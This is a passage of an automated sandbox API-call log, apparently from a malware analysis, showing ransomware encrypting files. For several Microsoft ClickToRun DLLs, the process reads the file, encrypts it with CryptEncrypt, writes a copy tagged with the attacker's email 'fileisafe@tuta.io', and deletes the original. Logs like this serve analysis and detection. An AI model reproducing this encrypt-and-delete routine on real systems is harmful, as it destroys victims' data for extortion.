[0142.356] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4ad0, lpOverlapped=0x0) returned 1 [0142.357] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0142.357] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.357] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x70, dwBufLen=0x70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x70) returned 1 [0142.358] CryptDestroyKey (hKey=0xac3130) returned 1 [0142.358] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x122, lpOverlapped=0x0) returned 1 [0142.358] CryptDestroyKey (hKey=0xac2db0) returned 1 [0142.358] CloseHandle (hObject=0x2f4) returned 1 [0142.358] CloseHandle (hObject=0x2f0) returned 1 [0142.359] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll")) returned 1 [0142.360] SetEvent (hEvent=0x288) returned 1 [0142.360] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.361] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=27840) returned 1 [0142.361] CloseHandle (hObject=0x2f0) returned 1 [0142.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll")) returned 0x20 [0142.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.362] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.362] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.362] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.362] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.362] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2e70) returned 1 [0142.362] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.362] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x6cc0, lpOverlapped=0x0) returned 1 [0142.365] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x6cd0, dwBufLen=0x6cd0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x6cd0) returned 1 [0142.365] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x6cd0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x6cd0, lpOverlapped=0x0) returned 1 [0142.366] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0142.366] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.366] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0142.366] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0142.366] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0142.366] CryptDestroyKey (hKey=0xac2e70) returned 1 [0142.366] CloseHandle (hObject=0x2f0) returned 1 [0142.366] CloseHandle (hObject=0x2f4) returned 1 [0142.368] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll")) returned 1 [0142.369] SetEvent (hEvent=0x288) returned 1 [0142.369] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.369] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=26816) returned 1 [0142.369] CloseHandle (hObject=0x2f4) returned 1 [0142.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll")) returned 0x20 [0142.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.369] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.369] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.370] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3030) returned 1 [0142.370] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.370] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x68c0, lpOverlapped=0x0) returned 1 [0142.606] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x68d0, dwBufLen=0x68d0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x68d0) returned 1 [0142.606] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x68d0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x68d0, lpOverlapped=0x0) returned 1 [0142.607] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3270) returned 1 [0142.608] CryptSetKeyParam (hKey=0xac3270, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.608] CryptEncrypt (in: hKey=0xac3270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x70, dwBufLen=0x70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x70) returned 1 [0142.608] CryptDestroyKey (hKey=0xac3270) returned 1 [0142.608] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x122, lpOverlapped=0x0) returned 1 [0142.608] CryptDestroyKey (hKey=0xac3030) returned 1 [0142.608] CloseHandle (hObject=0x2f4) returned 1 [0142.608] CloseHandle (hObject=0x2f0) returned 1 [0142.609] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll")) returned 1 [0142.611] SetEvent (hEvent=0x288) returned 1 [0142.611] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.611] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=24768) returned 1 [0142.611] CloseHandle (hObject=0x2f0) returned 1 [0142.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x20 [0142.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.612] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.612] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.612] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2e30) returned 1 [0142.612] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.612] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x60c0, lpOverlapped=0x0) returned 1 [0142.614] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60d0, dwBufLen=0x60d0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60d0) returned 1 [0142.614] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x60d0, lpOverlapped=0x0) returned 1 [0142.615] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac34b0) returned 1 [0142.615] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.616] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x70, dwBufLen=0x70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x70) returned 1 [0142.616] CryptDestroyKey (hKey=0xac34b0) returned 1 [0142.616] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x122, lpOverlapped=0x0) returned 1 [0142.616] CryptDestroyKey (hKey=0xac2e30) returned 1 [0142.616] CloseHandle (hObject=0x2f0) returned 1 [0142.616] CloseHandle (hObject=0x2f4) returned 1 [0142.621] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll")) returned 1 [0142.622] SetEvent (hEvent=0x288) returned 1 [0142.623] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.623] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=21184) returned 1 [0142.623] CloseHandle (hObject=0x2f4) returned 1 [0142.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll")) returned 0x20 [0142.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.623] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.623] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.624] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d70) returned 1 [0142.624] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.624] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x52c0, lpOverlapped=0x0) returned 1 [0142.626] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x52d0, dwBufLen=0x52d0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x52d0) returned 1 [0142.626] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x52d0, lpOverlapped=0x0) returned 1 [0142.628] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2f70) returned 1 [0142.628] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.628] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0142.628] CryptDestroyKey (hKey=0xac2f70) returned 1 [0142.628] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0142.628] CryptDestroyKey (hKey=0xac2d70) returned 1 [0142.628] CloseHandle (hObject=0x2f4) returned 1 [0142.628] CloseHandle (hObject=0x2f0) returned 1 [0142.629] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll")) returned 1 [0142.630] SetEvent (hEvent=0x288) returned 1 [0142.630] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.630] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=19136) returned 1 [0142.631] CloseHandle (hObject=0x2f0) returned 1 [0142.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll")) returned 0x20 [0142.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.631] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.631] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.631] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2f70) returned 1 [0142.631] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.631] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4ac0, lpOverlapped=0x0) returned 1 [0142.634] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0) returned 1 [0142.634] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4ad0, lpOverlapped=0x0) returned 1 [0142.636] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3030) returned 1 [0142.636] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.636] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x70, dwBufLen=0x70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x70) returned 1 [0142.636] CryptDestroyKey (hKey=0xac3030) returned 1 [0142.636] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x122, lpOverlapped=0x0) returned 1 [0142.636] CryptDestroyKey (hKey=0xac2f70) returned 1 [0142.636] CloseHandle (hObject=0x2f0) returned 1 [0142.636] CloseHandle (hObject=0x2f4) returned 1 [0142.637] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll")) returned 1 [0142.638] SetEvent (hEvent=0x288) returned 1 [0142.638] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" 